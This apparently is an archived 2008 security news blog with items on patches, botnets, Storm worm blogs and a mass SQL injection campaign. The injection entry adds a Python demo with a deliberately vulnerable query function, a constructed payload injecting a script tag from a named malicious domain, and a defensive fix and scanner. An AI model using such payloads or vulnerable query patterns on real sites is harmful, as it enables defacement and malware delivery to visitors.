Wednesday, April 30, 2008

Microsoft Helps In Hacker Busting With Its Botnet-hunting Tool

Microsoft is giving law enforcement agencies access to a special tool that keeps tabs on botnets. The tool draws on data compiled from the 450 million computer users who have installed the Malicious Software Removal Tool that ships with Windows.

"The tool includes data and software that helps law enforcers get a better picture of the data being provided by Microsoft's users", said Tim Cranton, associate general counsel with Microsoft's World Wide Internet Safety Programs.

Botnets are networks of compromised computers under an attacker's control. Together they act like a distributed supercomputer that is used, for example, to send spam and to attack servers on the Internet. Botnets have been on Microsoft's radar for about four years, since the company identified them as a significant emerging threat.

Microsoft had not talked about the tool publicly before, but it turns out it was already used in a Canadian police bust in February. The Sûreté du Québec used the botnet-buster to break up a network that had infected nearly 500,000 computers in 110 countries, according to Captain Frederick Gaudreau, who heads the provincial police force's cybercrime unit.

Source

Tuesday, April 29, 2008

WordPress 2.5.1 Fixes 2 Vulnerabilities And A Bunch of Bugs

A new version of WordPress has been released. It contains bug fixes and also fixes for two recently found vulnerabilities.

The first allows an attacker to bypass administrator access control with a specially crafted cookie, and from there to execute PHP code as the web server user. It can only be exploited on blogs that are configured to allow open user registration.

The second is a cross-site scripting (XSS) vulnerability: incomplete input checking makes it possible to execute script code in a user's browser.


Vulnerable versions for the above-mentioned vulnerabilities:
- WordPress 2.5 and possibly older versions

Solution:
- Update to version 2.5.1

More information can be read here.

Thursday, April 24, 2008

Mass SQL Injection Going On - Over 500,000 web sites infected already

F-Secure reports in its blog that a new wave of attacks is under way in which criminals' code is being inserted into web sites. The problem is massive: there are currently over half a million infected web sites.

On most web sites visitors can submit text, for example through blog comments or forum posts. If that input is pasted straight into database queries without validation or parameterization, which is all too common, an attacker can craft input that the database executes as part of the query. That is what an "SQL injection" attack is.

In the currently ongoing SQL injection attack the injected code alters text stored on the site so that it contains links pointing to the criminals' own sites. "There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan," says F-Secure. So far the domains used for hosting the malicious content are nmidahena.com, aspder.com and nihaorr1.com. At the moment the front page of each of those domains is unreachable, but that could change.

Web administrators are advised to check that their sites do not contain this attack code. Now (if it has not been done already) is also a good time to add protection for data submitted by users, so that malicious code cannot be inserted in the first place: validate the input and pass it to the database as query parameters rather than concatenating it into SQL.
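As an added example (not code from the original post or from F-Secure), the following Python script reproduces the pattern described above against an in-memory SQLite database: a search function that concatenates visitor input into a query and runs it through a driver call that accepts stacked statements, the parameterized version of the same query, and a small scanner that walks stored content looking for `<script>` or `<iframe>` references to the domains named above. The table layout, the comment data and the payload are constructed for illustration; the campaign's real injected statement is not reproduced here.

```python
"""Added example for the SQL injection entry above (not code from the original
post or from F-Secure). All data is constructed; the payload illustrates the
technique and is not the real one used in the campaign."""
import re
import sqlite3

# Domains the post names as hosting the malicious script files.
MALICIOUS_DOMAINS = ("nmidahena.com", "aspder.com", "nihaorr1.com")

# Host part of a <script> or <iframe> src attribute. Deliberately loose: the
# goal is to flag suspicious rows for a human, not to parse HTML exactly.
INJECTED_REF = re.compile(
    r"""<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)""",
    re.IGNORECASE,
)


def make_db():
    """In-memory stand-in for a site's comment table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO comments (body) VALUES ('first post')")
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """Vulnerable: the search term is pasted into the SQL text, and the driver
    call accepts several ';'-separated statements (executescript() stands in
    for drivers that do so by default), so a visitor can append any statement
    they like, including an UPDATE that rewrites every stored comment."""
    sql = "SELECT id, body FROM comments WHERE body LIKE '%" + term + "%';"
    conn.executescript(sql)


def search_safe(conn, term):
    """Fixed: a parameterized query. The term reaches the database as a value
    and is never interpreted as SQL, whatever characters it contains."""
    cur = conn.execute(
        "SELECT id, body FROM comments WHERE body LIKE ?", ("%" + term + "%",)
    )
    return cur.fetchall()


def injected_hosts(html):
    """Hosts of script/iframe references under a known malicious domain
    (exact match or subdomain), lower-cased."""
    hits = []
    for host in INJECTED_REF.findall(html):
        host = host.lower()
        if any(host == d or host.endswith("." + d) for d in MALICIOUS_DOMAINS):
            hits.append(host)
    return hits


def scan_comments(conn):
    """Walk every stored comment and report (row id, host) for injected
    references: the check the post recommends administrators run."""
    findings = []
    for row_id, body in conn.execute("SELECT id, body FROM comments"):
        findings.extend((row_id, host) for host in injected_hosts(body))
    return findings


# Constructed payload: closes the LIKE string, appends a script reference to
# every row, then comments out the remainder of the original query.
PAYLOAD = (
    "x'; UPDATE comments SET body = body || "
    "'<script src=\"http://nmidahena.com/1.js\"></script>'; --"
)


def demo():
    vuln = make_db()
    search_vulnerable(vuln, PAYLOAD)             # the appended UPDATE runs
    fixed = make_db()
    payload_rows = search_safe(fixed, PAYLOAD)   # treated as a plain search term
    return {
        "vulnerable_findings": scan_comments(vuln),        # [(1, 'nmidahena.com')]
        "fixed_findings": scan_comments(fixed),            # []
        "fixed_payload_rows": payload_rows,                # []
        "fixed_normal_rows": search_safe(fixed, "first"),  # [(1, 'first post')]
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The scanner only catches references to the three domains listed in the post; a real clean-up sweep should also look for any `<script>` or `<iframe>` tag that the site's own templates did not put there, since the hosting domains change as the campaign goes on.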

Monday, April 21, 2008

Unpatched Vulnerability In Windows Operating System

A new vulnerability has been found in the Windows operating system. It can be exploited by an authenticated attacker to gain elevated privileges. The problem is an error in how applications run in the context of the NetworkService or LocalService accounts: a process running under one of those accounts can gain access to resources of other processes running under the same account, and some of those processes are able to elevate their privileges to LocalSystem. As a result, any NetworkService or LocalService process can ultimately elevate its privileges to LocalSystem.

Microsoft is investigating the vulnerability and will release a fix if it deems one necessary. As a workaround Microsoft recommends configuring a specific Worker Process Identity (WPI) for each application pool, so that IIS worker processes no longer share the NetworkService account with other services.

For more information see the Microsoft Security Advisory on the vulnerability.

Vulnerable operating systems:
* Windows XP
* Windows Server 2003
* Windows Vista
* Windows Server 2008

Friday, April 18, 2008

Vulnerabilities in Open Office software

Multiple vulnerabilities have been identified in Open Office software, which could be exploited by attackers to cause a denial of service or compromise an affected system. These issues are caused by heap overflow and corruption errors when processing specially crafted ODF text documents with XForms, or when handling malformed Quattro Pro, EMF or OLE files, which could be exploited by attackers to crash an affected application or execute arbitrary code by tricking a user into opening a specially crafted document.

All versions prior to 2.4 are vulnerable, so users are instructed to update to the latest version.

Release Notes of Open Office version 2.4 can be read here.

Thursday, April 17, 2008

Firefox 2.0.0.14 update available

Mozilla has released Firefox 2.0.0.14, a security and stability update for the Firefox Internet browser.

New users can download latest version of the Firefox browser here.

If you already have Firefox 2.x installed you will receive an automated update notification within 24 to 48 hours. To apply the update manually please select "Check for Updates..." from the Help menu.

Release Notes of the update can be read here.

Wednesday, April 16, 2008

Sun released Java Runtime Environment (JRE) 6 Update 6

Sun has released an updated version of the Java SE Runtime Environment (JRE) 6. The Java SE Runtime Environment allows end users to run Java applications.

The new version can be downloaded from Sun's Java SE Downloads site (click the download button to the right of "Java Runtime Environment (JRE) 6 Update 6" and follow the instructions). Before installing the new version it is advisable to remove old versions first; a JRE update does not remove earlier installations, and those remain exploitable.

Release Notes of the update can be read here.

Monday, April 14, 2008

Oracle Warns of Critical DB Server Vulnerabilities

Database server giant Oracle plans to ship a major security update on Tuesday, April 15 to cover more than 40 vulnerabilities in a wide range of products.

The fixes are part of the company's quarterly CPU (critical patch update) and will cover severe vulnerabilities across hundreds of Oracle products.

According to Oracle's CPU Pre-Release Announcement this Critical Patch Update contains 17 new security fixes for the Oracle Database including 2 for Oracle Application Express. Two of these vulnerabilities may be remotely exploited without authentication (i.e. may be exploited over a network without the need for a username and password).

The CPU also contains 3 new fixes for Oracle Application Server. Each of those vulnerabilities may be remotely exploited without authentication.

    Other security fixes included in April CPU:
  • 11 new security fixes for the Oracle E-Business Suite, seven of these vulnerabilities may be remotely exploited without authentication

  • One new security fix for the Oracle Enterprise Manager, this vulnerability may not be remotely exploited without authentication

  • Three new security fixes for Oracle PeopleSoft Enterprise products, none of these vulnerabilities may be remotely exploited without authentication

  • Six new security fixes for Oracle Siebel SimBuilder products, three of these vulnerabilities may be remotely exploited without authentication



    Products affected by security vulnerabilities addressed by April CPU:
  • Oracle Database 11g, version 11.1.0.6

  • Oracle Database 10g Release 2, versions 10.2.0.2, 10.2.0.3

  • Oracle Database 10g, version 10.1.0.5

  • Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV

  • Oracle Application Server 10g Release 3 (10.1.3), versions 10.1.3.1.0, 10.1.3.3.0

  • Oracle Application Server 10g Release 2 (10.1.2), versions 10.1.2.0.2, 10.1.2.1.0, 10.1.2.2.0

  • Oracle Application Server 10g (9.0.4), version 9.0.4.3

  • Oracle Collaboration Suite 10g, version 10.1.2

  • Oracle E-Business Suite Release 12, versions 12.0.0 - 12.0.4

  • Oracle E-Business Suite Release 11i, versions 11.5.9 - 11.5.10 CU2

  • Oracle PeopleSoft Enterprise PeopleTools versions 8.22.19, 8.48.16, 8.49.09

  • Oracle PeopleSoft Enterprise HCM versions 8.8 SP1, 8.9, 9.0

  • Oracle Siebel SimBuilder versions 7.8.2, 7.8.5

Saturday, April 12, 2008

Security Pros Launch OCERT

A group of computer security professionals has launched oCERT (Open Source Computer Emergency Response Team), an effort to become the go-to place for security incident response for open-source projects. It is backed by Google, the security consulting firm Inverse Path and the Open Source Lab at Oregon State University.

oCERT aims to offer tools that help both small and large open-source projects handle the security of their software.

"Small open-source projects often don't have any form of security handling but the same code they manage [is] included by bigger projects and distributions. When there's a compromise, there's no proper coordination and that's not acceptable," says Andrea Barisani, oCERT founder and project coordinator to eWeek.

Thursday, April 10, 2008

Vulnerabilities found in Adobe Flash Player

Critical vulnerabilities have been identified in Adobe Flash Player that could allow an attacker who successfully exploits these potential vulnerabilities to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit these potential vulnerabilities.

Vulnerable programs are:

- Adobe Flash Player 9.0.115.0 and earlier versions
- Adobe Flash Player 8.0.39.0 and earlier versions
- Flex 3.0
- AIR 1.0

The fix is to upgrade Adobe Flash Player to the newest version, 9.0.124.0, by downloading it from the Player Download Center or by using the product's auto-update mechanism when prompted. Flex users can get the update here and AIR users through the AIR Download Centre.


More information can be found here.

Tuesday, April 8, 2008

Microsoft released updates for Windows and Office vulnerabilities

Microsoft released its monthly security updates today: eight bulletins in total, five of which are rated critical.

More information of the updates can be found here.

Finnish Tietokone.fi portal under iFrame attack

The web portal of the Finnish computer magazine Tietokone was taken offline for ten hours on Friday afternoon (4 April) after it was found to be serving a malicious script. The attack method was a so-called iFrame injection, which was possible because the server's security updates were not up to date. Only Internet Explorer (IE) users were affected, since the malware relied on ActiveX, which only IE supports.

The attack is part of a large-scale campaign that security consultant Dancho Danchev describes in his blog. The nmidahena.com server currently serves its script on over 3000 web sites, so Tietokone.fi was not a specially chosen target. In recent weeks similar attacks have hit large sites such as USA Today, News.com and the Miami Herald, among many others.

Monday, April 7, 2008

Storm Blogs At Blogspot.com

The Storm worm is once again targeting the blogging community, this time Blogspot.com in particular. Several Blogger sites with random or odd names have been created. These sites appear to have been set up solely for Storm's purposes; no legitimate Blogger site has so far been reported as infected.

Visiting one of these sites redirects the visitor to another page while keeping the Blogger menu at the top.

Clicking the image on the page downloads a file named love.exe; clicking the link downloads withlove.exe.


Source

Computer Viruses Expected To Hit 1 Million By The End of Year

Security experts say that the total number of viruses will reach one million by year's end.

That is because malware writers have been forced to create new variants and exploits more frequently as businesses and individuals improve their security practices, the experts said.

According to F-Secure Asia Pacific vice president Jari Heinonen, malware will increasingly target the kernel through rootkits such as Mebroot, which infects the master boot record.

Source